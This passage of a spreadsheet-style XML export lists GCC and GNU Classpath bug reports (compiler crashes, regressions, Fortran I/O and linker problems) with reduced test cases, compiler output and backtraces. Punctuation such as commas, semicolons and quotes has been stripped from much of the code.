I propose that we simply delete that line and modify InetSocketAddress.getHostName() to call addr.getHostName() if not already set (like in InetAddress).  InetSocketAddress.toString would have to be modified as well (similar to InetAddress.toString).
This should eliminate many useless reverse-DNS requests in applications like azureus.</t>
  </si>
  <si>
    <t>GCC-50732</t>
  </si>
  <si>
    <t>[type_traits] is_base_of unnecessarily instantiates Base (which shouldn't be instantiated)</t>
  </si>
  <si>
    <t>Created attachment 25504
Test case (which fails to be compiled)
Let `Base` be an instance of a class template. By FDIS 20.9.4.3 p3 
`Base` can be incomplete type and its instantiation should be avoided 
in `is_base_of`. But as can be seen below g++ erroneously 
instantiates `Base` when its definition is visible. 
The following code compiles fine:
    #include 
    #include 
    template  struct non_instantiatable
    int main (int argc char* argv[])
    {
        std::cout  void&gt;::value &lt;&lt; std::endl
        return 0
    }
But if we add the definition the code fails to compile 
since g++ tries to instantiate `non_instantiatable`: 
    #include 
    #include 
    template 
    struct non_instantiatable
    {
        typedef typename T::THIS_TYPE_CANNOT_BE_INSTANTIATED type
    }
    int main (int argc char* argv[])
    {
        std::cout  void&gt;::value &lt;&lt; std::endl
        return 0
    }
Tested on g++ 4.7.0 20111008 (experimental).</t>
  </si>
  <si>
    <t>GCC-78935</t>
  </si>
  <si>
    <t>[7 Regression] ICE on allocating derived type coarray with allocatable components</t>
  </si>
  <si>
    <t>As shown below a trunk build dated 20161224 reports an internal compiler error with an array allocation statement in the same scope as the allocation of a coarray with allocatable components. No ICE occurs when (1) the two modules are concatenated into one file or (2) the USE statement is moved into the subroutine or (3) the order of the allocate statements is reverse or (4) the USE statement is moved into the subroutine.  Because this is a greatly reduced bug reproducer from an OpenCoarrays user I don't know which of the workarounds is feasible or will work in the full application setting. 
$ gfortran --version
GNU Fortran (GCC) 7.0.0 20161224 (experimental)
$ cat declarations.f90 
module DECLARATIONS
    type EXCHANGE_BOUNDHI
        realallocatable::NORMALS(:)
    end type 
    type(EXCHANGE_BOUNDHI)allocatable::IEXBOUNDHISI[:]
    real allocatable :: x(:)
end module 
$ cat communications.f90 
    USE DECLARATIONS
contains
    SUBROUTINE EXHBOUNDHIGHER2()
        allocate(x(1))
        allocate(IEXBOUNDHISI[*])
    END SUBROUTINE 
END
$ gfortran -fcoarray=lib -c declarations.f90 communications.f90 
communications.f90:5:0:
         allocate(IEXBOUNDHISI[*])
internal compiler error: in gfc_conv_descriptor_token at fortran/trans-array.c:305
0x6faa1d gfc_conv_descriptor_token(tree_node*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-array.c:303
0x73ae88 gfc_trans_structure_assign(tree_node* gfc_expr* bool bool)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-expr.c:7534
0x73bc32 gfc_conv_structure(gfc_se* gfc_expr* int)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-expr.c:7651
0x73425c gfc_conv_expr(gfc_se* gfc_expr*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-expr.c:7818
0x73db75 gfc_trans_assignment_1
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-expr.c:9877
0x781b59 gfc_trans_allocate(gfc_code*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-stmt.c:6293
0x6f3557 trans_code
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans.c:1966
0x7245f8 gfc_generate_function_code(gfc_namespace*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-decl.c:6285
0x7242ec gfc_generate_contained_functions
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-decl.c:5280
0x7242ec gfc_generate_function_code(gfc_namespace*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/trans-decl.c:6214
0x6abf76 translate_all_program_units
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/parse.c:6008
0x6abf76 gfc_parse_file()
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/parse.c:6208
0x6ef672 gfc_be_parse_file
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/trunk/gcc/fortran/f95-lang.c:202
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-11282</t>
  </si>
  <si>
    <t>[3.3 regression] Infinite memory usage after syntax error</t>
  </si>
  <si>
    <t>Hi
this was reported by Lukas Ruf (ruf at rawip org) on gcc-bugs 29 May 2003
however I can't find it in the database (or even in the list archive...?).
Test case:
struct parameter_struct_t {
  char short_option
  char *long_option
}
parameter_struct_t *parameters[] = {
  {
    'f'
    from
  }
}
% g++ --version
g++ (GCC) 3.3.1 20030619 (prerelease)
% g++ -c away.cc
away.cc:8: error: syntax error before `' token
[killed because out of memory]
mainline says:
away.cc:8: error: expected `}'
away.cc:8: error: expected `}'
away.cc:8: error: brace-enclosed initializer used to initialize `
   parameter_struct_t*'
away.cc:9: error: expected unqualified-id
away.cc:9: error: expected `' or `'
away.cc:10: error: expected declaration</t>
  </si>
  <si>
    <t>CLASSPATH-22804</t>
  </si>
  <si>
    <t>HttpURLConnection.getHeaderFields() returns String-&gt;String rather than String-&gt;List</t>
  </si>
  <si>
    <t>URLConnection.getHeaderFields() is specified to return a Map from Strings to Lists since there can be more than one header field with the same key (see http://java.sun.com/j2se/1.4.2/docs/api/java/net/URLConnection.html#getHeaderFields()). Sun's implementation (ver 1.4.2_04) works that way. The Classpath implementation returns a Map from Strings to Strings.</t>
  </si>
  <si>
    <t>GCC-43033</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] --enable-checking=valgrind C++ failures</t>
  </si>
  <si>
    <t>Almost all C++ sources with --enable-checking=valgrind yield valgrind errors simple testcase is:
extern C void abort ()
This regression was caused by PR28274 http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=145042
change - when t != x x has been already ggc_freed so dereferencing it is invalid.</t>
  </si>
  <si>
    <t>GCC-42090</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] I/O: Problems when reading partial records in formatted direct access files</t>
  </si>
  <si>
    <t>Consider the following:
Wot now ? cat da.f90
Program da
  Implicit None
  Real :: a b
  a = 1.111111111
  b = 2.222222222
  Open( 10 File = 't.dat' Form = 'Formatted' Access = 'Direct' Recl = 12 )
  Write( 10 rec = 1 fmt = '( f6.4 / f6.4 )' ) a b
  Close( 10 )
  a = -1.0
  b = -1.0
  Open( 10 File = 't.dat' Form = 'Formatted' Access = 'Direct' Recl = 12 )
  Read( 10 rec = 1 fmt = '( f6.4 / f6.4 )' ) a b
  Write( * '( Partial record 1 t25 2( f6.4 1x ) )' ) a b
  Read( 10 rec = 1 fmt = '( f6.4 )' ) a b
  Write( * '( Partial record 2 t25 2( f6.4 1x ) )' ) a b
  Read( 10 rec = 1 fmt = '( f12.4 / f12.4 )' ) a b
  Write( * '( Full record 1 t25 2( f6.4 1x ) )' ) a b
  Read( 10 rec = 1 fmt = '( f12.4 )' ) a b
  Write( * '( Full record 2 t25 2( f6.4 1x ) )' ) a b
  Read( 10 rec = 1 fmt = '( f6.4 6x / f6.4 6x )' ) a b
  Write( * '( Full record with 6x t25 2( f6.4 1x ) )' ) a b
  Read( 10 rec = 1 fmt = '( f6.4 )' ) a
  Read( 10 rec = 2 fmt = '( f6.4 )' ) b
  Write( * '( Record at a time t25 2( f6.4 1x ) )' ) a b
End Program da
Wot now ? ~/Download/usr/local/gfortran/bin/gfortran --version
GNU Fortran (GCC) 4.5.0 20091116 (experimental) [trunk revision 154218]
Copyright (C) 2009 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
Wot now ? ~/Download/usr/local/gfortran/bin/gfortran -W -Wall -pedantic -fbounds-check -g -O2 da.f90
Wot now ? ./a.out
Partial record 1        1.1111 0.0000
Partial record 2        1.1111 0.0000
Full record 1           1.1111 2.2222
Full record 2           1.1111 2.2222
Full record with 6x     1.1111 2.2222
Record at a time        1.1111 2.2222
Wot now ? 
Note that when reading partial records gfortran gets the value of b wrong. Compare g95 and the sun fortran compiler:
Wot now ? g95 --version
G95 (GCC 4.0.3 (g95 0.92!) Mar 27 2009)
Copyright (C) 2002-2008 Free Software Foundation Inc.
G95 comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of G95
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
Wot now ? g95 -W -Wall -pedantic -fbounds-check -g -O2 da.f90
Wot now ? ./a.out
Partial record 1        1.1111 2.2222
Partial record 2        1.1111 2.2222
Full record 1           1.1111 2.2222
Full record 2           1.1111 2.2222
Full record with 6x     1.1111 2.2222
Record at a time        1.1111 2.2222
Wot now ? f90 -V
f90: Sun Fortran 95 8.4 Linux_i386 2009/06/03
Usage: f90 [ options ] files.  Use 'f90 -flags' for details
Wot now ? f90 da.f90
Wot now ? ./a.out
Partial record 1        1.1111 2.2222
Partial record 2        1.1111 2.2222
Full record 1           1.1111 2.2222
Full record 2           1.1111 2.2222
Full record with 6x     1.1111 2.2222
Record at a time        1.1111 2.2222
I've also checked against the intel portland group pathscale and cray compilers and they all give what I think is the correct result i.e. the same as g95 and the sun compiler
Also sorry about screwing up the first attempt at submission !</t>
  </si>
  <si>
    <t>ian.bush</t>
  </si>
  <si>
    <t>GCC-19349</t>
  </si>
  <si>
    <t>[4.0 Regression] Valgrind errors compiling libjava c++ sources</t>
  </si>
  <si>
    <t>When configuring with --enable-checking=assertmisctreegcrtlflagvalgrind
compilation of some c++ source files in the libjava directory give the following  
invalid reads:
/home/mark/src/gcc-obj/gcc/xgcc -shared-libgcc -B/home/mark/src/gcc-obj/gcc/
-nostdinc++ -L/home/mark/src/gcc-obj/i686-pc-linux-gnu/libstdc++-v3/src
-L/home/mark/src/gcc-obj/i686-pc-linux-gnu/libstdc++-v3/src/.libs
-B/usr/local/gcc40/i686-pc-linux-gnu/bin/
-B/usr/local/gcc40/i686-pc-linux-gnu/lib/ -isystem
/usr/local/gcc40/i686-pc-linux-gnu/include -isystem
/usr/local/gcc40/i686-pc-linux-gnu/sys-include -DHAVE_CONFIG_H -I.
-I../../../gcc/libjava -I./include -I./gcj -I../../../gcc/libjava -Iinclude
-I../../../gcc/libjava/include -I../../../gcc/libjava/../boehm-gc/include
-I../boehm-gc/include -I../../../gcc/libjava/libltdl
-I../../../gcc/libjava/libltdl -I../../../gcc/libjava/.././libjava/../gcc
-I../../../gcc/libjava/../zlib -I../../../gcc/libjava/../libffi/include
-I../libffi/include -O2 -g -O2 -fno-rtti -fnon-call-exceptions
-fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSET_BITS=64 -ffloat-store
-fno-omit-frame-pointer -I/usr/X11R6/include -Wextra -Wall -D_GNU_SOURCE
-DPREFIX=\/usr/local/gcc40\ -DLIBDIR=\/usr/local/gcc40/lib\
-DBOOT_CLASS_PATH=\/usr/local/gcc40/share/java/libgcj-4.0.0.jar\
-DJAVA_EXT_DIRS=\/usr/local/gcc40/share/java/ext\ -g -O2 -D_GNU_SOURCE -MT
prims.lo -MD -MP -MF .deps/prims.Tpo -c ../../../gcc/libjava/prims.cc  -fPIC
-DPIC -o .libs/prims.o
==28413== Invalid read of size 1
==28413==    at 0x814DA3B: pushdecl_namespace_level (name-lookup.c:3027)
==28413==    by 0x81188C5: do_friend (friend.c:546)
==28413==    by 0x8072546: grokdeclarator (decl.c:8084)
==28413==    by 0x80D07D4: grokfield (decl2.c:845)
==28413==  Address 0x1C32087C is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-17193</t>
  </si>
  <si>
    <t>[meta-bug] Pointer arguments not working correctly</t>
  </si>
  <si>
    <t>Pointer arguments to procedures are broken unless in the case of simple
datataypes. The outcome of this deficiency are the dependent PRs.</t>
  </si>
  <si>
    <t>GCC-39334</t>
  </si>
  <si>
    <t>Recusive parameter kind produces segfault</t>
  </si>
  <si>
    <t>From James van Buskirk on clf:
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/81ebe96bb6b05dc3#
C:\gfortran\clf\recursive_parameter&gt;type recursive_parameter.f90
program recursive_parameter
   implicit none
   integer parameter :: dp = kind(1.0_dp)
   write(**) dp
end program recursive_parameter
C:\gfortran\clf\recursive_parameter&gt;gfortran
recursive_parameter.f90 -orecursive
_parameter
f951.exe: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-33302</t>
  </si>
  <si>
    <t>dead-store not eliminated</t>
  </si>
  <si>
    <t>This is a follow-up on bug 33291. It uses the same testcase (repeated here) but with some additional optimization flags.
-------------------------------------------
struct Clock {
 void f()
 void add(unsigned n) { a += n }
 int a
}
struct CPU : Clock {
 virtual ~CPU()
 unsigned char readSlow()
 void execute()
 void delay() { add(2) }
 unsigned char readFast() {
  if (unsigned char* p = ptrs[addr &gt;&gt; 8]) {
   // fast-path
   delay()
   delay()
   return p[addr 
  } else {
   // slow-path
   return readSlow()
  }
 }
 typedef void (CPU::*FuncPtr)()
 static FuncPtr tab[256]
 unsigned char* ptrs[256]
 unsigned addr
}
void CPU::execute() {
 f()
 while (true) {
  unsigned char b = readFast()
  delay()
  (this-&gt;*tab[b])()
 }
}
----------------------------------------
When compiled with SVN revision 128074 on a linux x86_64 machine:
&gt; g++ -O3 -fforce-addr -ftracer -S CPU.ii
&gt; cat CPU.s
    ...
    movl    (%rbx) %eax
    leal    4(%rax) %edx
    addl    $6 %eax
    movl    %edx (%rbx)       #### dead store
    movzbl  (%r12) %edx
    movzbl  (%rcx%rdx) %edx
    movl    %eax (%rbx)
    ...</t>
  </si>
  <si>
    <t>GCC-45453</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_cgraph_node failed: inlined_to pointer set for noninline callers with -O2 -fno-early-inlining</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O2 -fno-early-inlining testcase.C
Compiler output:
$ /mnt/svn/gcc-trunk/binary-163636-lto-fortran-checking-yes-rtl-df/bin/gcc -O2 -fno-early-inlining testcase.C 
testcase.C:14:1: error: inlined_to pointer set for noninline callers
testcase.C:14:1: error: multiple inline callers
virtual void S::foo()/0(0) @0x7f8cb444b158 (asm: _ZN1S3fooEv) (inline copy in void B()/1) availability:available analyzed 13 time 12 benefit 4 size 3 benefit reachable body finalized inlinable
  called by: virtual void S::foo()/0 (1.00 per call) (indirect_inlining) (can throw external) void B()/1 (1.00 per call) (inlined) (can throw external) 
  calls: virtual void S::foo()/0 (indirect_inlining) (1.00 per call) (can throw external) 
  References: 
  Refering this function: 
testcase.C:14:1: internal compiler error: verify_cgraph_node failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r163636 - crash
r161170 - crash
r159696 - crash
r158969 - OK
4.5 r160526 - OK</t>
  </si>
  <si>
    <t>GCC-36462</t>
  </si>
  <si>
    <t>[F03] Audit intrinsics for KIND arguments</t>
  </si>
  <si>
    <t>$ cat a.f90 
  character(10) string
  string = 'ABCDEEDCBA'
  write(**) index(string'A'kind=1)
  end
$ gfortran a.f90 &amp;&amp; ./a.out
   10
I suspect we're passing 1 as a logical BACK argument to the library function. Well I do more than suspect I checked and that's indeed what we do :)
Work needed in trans-intrinsic.c probably an easy one. Will need auditing other intrinsics that were added a KIND argument in F2003.</t>
  </si>
  <si>
    <t>GCC-7512</t>
  </si>
  <si>
    <t>ld getting passed incorrect options with hppa64-hp-hpux11.00</t>
  </si>
  <si>
    <t>When g++ is asked to build a shared library through the
-shared option on hppa64-hp-hpux11.00 I get the following
error:
ld: Unrecognized argument: -shared
Fatal error.
collect2: ld returned 1 exit status
Release:
3.1.1
How-To-Repeat:
// Begin foo.C
#include 
int main() {
  std::cout &lt;&lt; Hello world. &lt;&lt; std::endl
}
// End foo.C
I built g++ using the configure options of
--host=hppa64-hp-hpux11.00
--disable-shared
--disable-threads
--without-gnu-ld
--with-ld=/usr/ccs/bin/ld
--with-gnu-as
--with-as=/PATH_TO_BINUTILS/as
--enable-languages=cc++
I get the error with the following compile lines:
g++ -c foo.C
g++ -shared foo.o -o foo.sl</t>
  </si>
  <si>
    <t>keith_richling</t>
  </si>
  <si>
    <t>GCC-46039</t>
  </si>
  <si>
    <t>GCC 4.6 fails to bootstrap or compile at all with gold linker</t>
  </si>
  <si>
    <t>Created attachment 22056
preprocessed version of the conftest which hangs
When GCC starts configuring the libstdc++ it runs the conftest:
checking whether a statically linked program can dlopen itself...
which hangs.
I tried gcc-4.3 and gcc-4.4 and gcc-4.6 as a compiler for the conftest and all hanged when I used gold.
in order to reproduce the bug:
gcc  -o conftest -g -O2 -Wl--export-dynamic -static conftest.ii.c -ldl
gold version:
GNU gold (GNU Binutils for Debian 2.20.1-system.20100303) 1.9</t>
  </si>
  <si>
    <t>GCC-28821</t>
  </si>
  <si>
    <t>Unable to build Python</t>
  </si>
  <si>
    <t>There are two problems:
1.) Unsatisfied code symbol '__cxa_finalize' in load module
gcc-4.1.0 compiles __cxa_finalize into shared libs as weak symbol (4611686018427425864|       4|FUNC |WEAK |0|   .text|__cxa_finalize) gcc-4.1.1 doesn't (0|       0|FUNC |GLOB |0|   UNDEF|__cxa_finalize). That's a problem for Python because it loads modules at runtime.
To solve this problem John David Anglin suggested the following patch which forces the linkage of __cxa_finalize into main:
Index: config/pa/pa64-hpux.h
===================================================================
--- config/pa/pa64-hpux.h	(revision 115902)
+++ config/pa/pa64-hpux.h	(working copy)
@@ -337 +338 @@
    %{!shared:%{pg:-L/lib/pa20_64/libp -L/usr/lib/pa20_64/libp %{!static:\
      %nWarning: consider linking with `-static' as system libraries with\n\
      %n  profiling support are only provided in archive format}}}\
-   %{mhp-ld:+Accept TypeMismatch -z} -E %{mlinker-opt:-O} %{!shared:-u main}\
+   %{mhp-ld:+Accept TypeMismatch -z} -E %{mlinker-opt:-O}\
+   %{!shared:-u main %{!nostdlib:%{!nodefaultlibs:-u __cxa_finalize}}}\
    %{static:-a archive} %{shared:%{mhp-ld:-b}%{!mhp-ld:-shared}}
 #else
 #define LINK_SPEC \
@@ -437 +448 @@
    %{!shared:%{pg:-L/lib/pa20_64/libp -L/usr/lib/pa20_64/libp %{!static:\
      %nWarning: consider linking with `-static' as system libraries with\n\
      %n  profiling support are only provided in archive format}}}\
-   %{!mgnu-ld:+Accept TypeMismatch -z} -E %{mlinker-opt:-O} %{!shared:-u main}\
+   %{!mgnu-ld:+Accept TypeMismatch -z} -E %{mlinker-opt:-O}\
+   %{!shared:-u main %{!nostdlib:%{!nodefaultlibs:-u __cxa_finalize}}}\
    %{static:-a archive} %{shared:%{mgnu-ld:-shared}%{!mgnu-ld:-b}}
 #endif
2.) python aborts on exit
__deregister_frame_info_bases aborts at the gcc_assert here:
  __gthread_mutex_unlock (
  gcc_assert (ob)
I try to debug this a little bit further.</t>
  </si>
  <si>
    <t>CLASSPATH-41686</t>
  </si>
  <si>
    <t>Building sun.security.jgss.GSSUtil requires javax.security.auth.kerberos.KerberosTicket.getSessionKeyType():</t>
  </si>
  <si>
    <t># Running javac:
/mnt/builder/icedtea7/bootstrap/jdk1.6.0/bin/javac -J-XX:ThreadStackSize=1536 -J-XX:-PrintVMOptions -J-XX:+UnlockDiagnosticVMOptions -J-XX:-LogVMOutput -J-Xmx896m -J-Xms128m -J-XX:PermSize=32m -J-XX:MaxPermSize=160m -g -source 7 -target 7 -encoding ascii -Xbootclasspath:/mnt/builder/icedtea7/openjdk-boot/build/linux-amd64/classes -sourcepath /mnt/builder/icedtea7/generated:../../../../src/solaris/classes:../../../../src/share/classes -bootclasspath /mnt/builder/icedtea7/bootstrap/jdk1.7.0/jre/lib/rt-closed.jar::/mnt/builder/icedtea7/openjdk-boot/build/linux-amd64/classes -d /mnt/builder/icedtea7/openjdk-boot/build/linux-amd64/classes @/mnt/builder/icedtea7/openjdk-boot/build/linux-amd64/tmp/sun/org.ietf.jgss/.classes.list
Annotation processing got disabled since it requires a 1.6 compliant JVM
----------
1. ERROR in /mnt/builder/icedtea7/openjdk-boot/jdk/make/org/ietf/jgss/../../../../src/share/classes/sun/security/jgss/GSSUtil.java (at line 202)
	tempTkt.getSessionKeyType()
	        ^^^^^^^^^^^^^^^^^
The method getSessionKeyType() is undefined for the type KerberosTicket
----------
1 problem (1 error)make[6]: *** [.compile.classlist] Error 255
make[6]: Leaving directory `/mnt/builder/icedtea7/openjdk-boot/jdk/make/org/ietf/jgss'</t>
  </si>
  <si>
    <t>GCC-11450</t>
  </si>
  <si>
    <t>[3.4 Regression] fpos problems</t>
  </si>
  <si>
    <t>fpos fails to link for StateT other than mbstate_t. As noted in
DR 352 the standard doesn't give any requirements for StateT but in
previous versions of gcc fpos has worked for any type that is
DefaultConstuctable CopyConstructable and Assignable.
Also the comment
      // NB: The standard defines only the implicit copy ctor and the
      // previous two members.  The rest is a conforming extension.
is incorrect since almost all of what follows is required by the standard.</t>
  </si>
  <si>
    <t>GCC-40934</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in get_hard_regnum at reg-stack.c:741</t>
  </si>
  <si>
    <t>I got these ICEs while testing gcc-4.5 in compiling the uhexen2 source:
$ CC=gcc45 make h2 1&gt; /dev/null
view.c: In function 'V_RenderView':
view.c:1084:1: internal compiler error: in get_hard_regnum at reg-stack.c:741
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [view.o] Error 1
 or:
$ CC=gcc45 make glh2 1&gt; /dev/null
gl_rsurf.c: In function 'GL_BuildLightmaps':
gl_rsurf.c:1627:1: internal compiler error: in get_hard_regnum at reg-stack.c:741
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [gl_rsurf.o] Error 1
The C sources mentioned are at http://uhexen2.cvs.sourceforge.net/viewvc/uhexen2/hexen2/ .   I can't give you an exact line number because the line numbers reported by gcc are the closing braces of the functions.  This is noticed on Fedora 9.  Relevant software environment:  binutils-2.18.50.0.6-7.fc9.i386 gmp-4.2.2-7.fc9.i386 mpfr-2.3.2-0.1.fc9.i386 gcc-4.3.0-8.i386 (boot compiler)
$ gcc45 -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc45.r150333/configure --prefix=/home/ozzie/opt/gcc450 --program-suffix=45 --bindir=/home/ozzie/bin --with-local-prefix=/usr --disable-nls --enable-shared --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20090801 (experimental) r150333 (GCC)
If any more info is needed I would try to provide.</t>
  </si>
  <si>
    <t>sezeroz</t>
  </si>
  <si>
    <t>GCC-28118</t>
  </si>
  <si>
    <t>ICE calling subroutine defined via explicit interface</t>
  </si>
  <si>
    <t>Howdy
the attached code ICE's in the subroutine call:
gfcbug33.f90: In function 'MAIN__':
gfcbug33.f90:17: internal compiler error: Segmentation fault
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-59143</t>
  </si>
  <si>
    <t>[OOP] Bogus warning with array-valued type-bound procedure</t>
  </si>
  <si>
    <t>The following code produces a warning but is valid code:
gfortran  -c phs_single.f90
phs_single.f90:14.16:
    call func1 (phs%decay_p ())
                1
Warning: Actual argument contains too few elements for dummy argument 'p' (1/2) at (1)
The code is:
module phs_single
  type :: phs_single_t
     real dimension(:) allocatable :: p
   contains
     procedure :: evaluate
     procedure :: decay_p 
  end type phs_single_t
contains
  subroutine evaluate (phs)
    class(phs_single_t) intent(inout) :: phs
    call func1 (phs%decay_p ())
  end subroutine evaluate
  subroutine func1 (p)
    real dimension(2) intent(in) :: p
    print * p
  end subroutine func1
  function decay_p (phs) result (p)
    class(phs_single_t) intent(in) :: phs
    real dimension(2) :: p
    p(1) = 1.
    p(2) = 5.
  end function decay_p
end module phs_single</t>
  </si>
  <si>
    <t>GCC-25496</t>
  </si>
  <si>
    <t>[m68k] Compiled Code Segfaults</t>
  </si>
  <si>
    <t>gcc -O2 -falign-loops=4 -fomit-frame-pointer -funroll-loops -o buggy buggy.c
$ ./buggy
DBname = &gt;&gt;English.xmg&lt;&lt;
Segmentation fault
If you drop any single one of the parameters it works. Dropping -O2 to
-O1 also works.
I wasn't able to find a simpler file that illustrated the problem but
the attached are pretty short.
This code works fine on the other debian ports.
$ gcc -v
Using built-in specs.
Target: m68k-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++javaf95objctreelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.0 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr --disable-werror --enable-checking=release m68k-linux-gnu
Thread model: posix
gcc version 4.0.3 20051201 (prerelease) (Debian 4.0.2-5)
onestring:
1debug:\n
buggy.c:
#include 
#include 
#include 
#define X_MAXNUM 1832
#define X_HEADER        CSOUND_STRINGS\n
#define DEBUG (1)
long benlong(long lval)       /* coerce a natural long into a bigendian long */
{
    char  benchar[4]
    char *p = benchar
    *p++ = (char)(0xFF 
    *p++ = (char)(0xFF 
    *p++ = (char)(0xFF 
    *p   = (char)(0xFF 
    return(*(long *)benchar)
}
/* String file will have a header string (X_HEADER) and then 10 characters
   making a language for identification
*/
int main(int argc char **argv)
{
    char buff[256]
    long strings[X_MAXNUM]
    long loc baseloc
    int j
    int n
    long item = 0
    FILE *db
    FILE *raw
    char dbname[16]
    char lang[30] = {'E' 'n' 'g' 'l' 'i' 's' 'h' '\0'}
    int order = ('t'&lt;&lt;24)|('x'&lt;&lt;16)|('t'&lt;&lt;8)
    if (argc&gt;=2) raw = fopen(argv[1] rb)
    else raw = fopen(onestring rb)
    if (raw == NULL) {
      fprintf(stderr Failed to open input file\n)
      exit(1)
    }
    if (argc==3) {
      /* 7 is length of `English' and there are 10 maximum */
      int len = strlen(argv[2])
      if (len&gt;29) len = 29
      strncpy(lang argv[2] len)
      memset(lang+len '\0' 30-len) /* Null rest */
    }
    strcpy(dbname lang) strcat(dbname .xmg) /* ****** */
    if (DEBUG) fprintf(stderr DBname = &gt;&gt;%s&lt;&lt;\n dbname)
    db = fopen(dbname wb)
    if (db == NULL) {
      fprintf(stderr Failed to create DB file\n)
      exit(1)
    }
    fwrite(
    fwrite(X_HEADER sizeof(X_HEADER)-1 1 db)
    fwrite(lang sizeof(char) 30 db)
    n = X_MAXNUM
    n = benlong(n)
    fwrite(
    baseloc = ftell(db)
    for (j=0 j&lt;X_MAXNUM j++) strings[j] = 0L
    fwrite(strings sizeof(long) X_MAXNUM db) /* Write header */
    loc = ftell(db)
    if (DEBUG) fprintf(stderr Baseloc=%lx Loc=%lx\n baseloc loc)
    for () {                  /* Read the text until ended */
      long n = 0
      long i
      int ch = getc(raw)
      while (ch=='\r' || ch =='\n') ch = getc(raw)
      if (DEBUG) fprintf(stderr Read '%c'(%.2x)\n ch ch)
      while (isdigit(ch)) {
        if (DEBUG) fprintf(stderr Read '%c'(%.2x)\n ch ch)
        n = n*10+ch-'0'
        ch = getc(raw)
      }
      if (DEBUG) fprintf(stderr String# %ld\n n)
      if (ch==EOF) break
      if (ch!='') {
        fprintf(stderr
                item %ld/%ld: Syntax error -- expecting comma got '%c'%2x\n
                item n ch ch)
        exit(1)
      }
      item = n
      i = 0
      while ((ch=getc(raw))!='') 
                                /* Now read the string */
      while ((ch = getc(raw))!='') {
        if (ch=='\\') {
          ch=getc(raw)
          switch (ch) {
          case 'a':
            ch = '\a' break
          case 'b':
            ch = '\b' break
          case 'n':
            ch = '\n' break
          case 'r':
            ch = '\r' break
          case 't':
            ch = '\t' break
          default:
            break
          }
        }
        buff[i++]=ch
      }
      buff[i++] = '\0'
      strings[n] = loc
      n = benlong(i)
      fwrite(
      fwrite(buff sizeof(char) i db)
      loc = ftell(db)
      while ((ch=getc(raw))!='\n')
    }
    fseek(db baseloc SEEK_SET)
    for (j=0 j&lt;X_MAXNUM j++) strings[j] = benlong(strings[j])
    fwrite(strings sizeof(long) X_MAXNUM db) /* rewrite header */
    fclose(raw)
    fclose(db)
    fprintf(stderr OK\n)
    return(0)
}</t>
  </si>
  <si>
    <t>stephen</t>
  </si>
  <si>
    <t>GCC-51058</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: gimple check: expected gimple_assign(error_mark) have gimple_call() in gimple_assign_rhs_code at gimple.h:1992</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin10 at revision 181200 compiling the polyhedron test mdbx.f90 with '-O2 -ftree-vectorize' gives an ICE:
[macbook] lin/test% gfc -c mdbx.f90 -O2 -ftree-vectorize
mdbx.f90: In function 'mlist':
mdbx.f90:1199:0: internal compiler error: gimple check: expected gimple_assign(error_mark) have gimple_call() in gimple_assign_rhs_code at gimple.h:1992
Revision 181085 is OK. The following reduced test reproduces the ICE:
      SUBROUTINE MLIST(MOLspPBCxPBCyPBCz X0)
      IMPLICIT NONE
      INTEGER PARAMETER :: NM=16384
      INTEGER :: MOLsp i
      DOUBLE PRECISION :: PBCx PBCy PBCz boxjmp HALf=1./2.
      DOUBLE PRECISION :: X0(3-2:NM)
         DO i = 1  MOLsp
            boxjmp = PBCx*INT(X0(1i)+SIGN(HALfX0(1i)))
            X0(1i) = X0(1i) - boxjmp
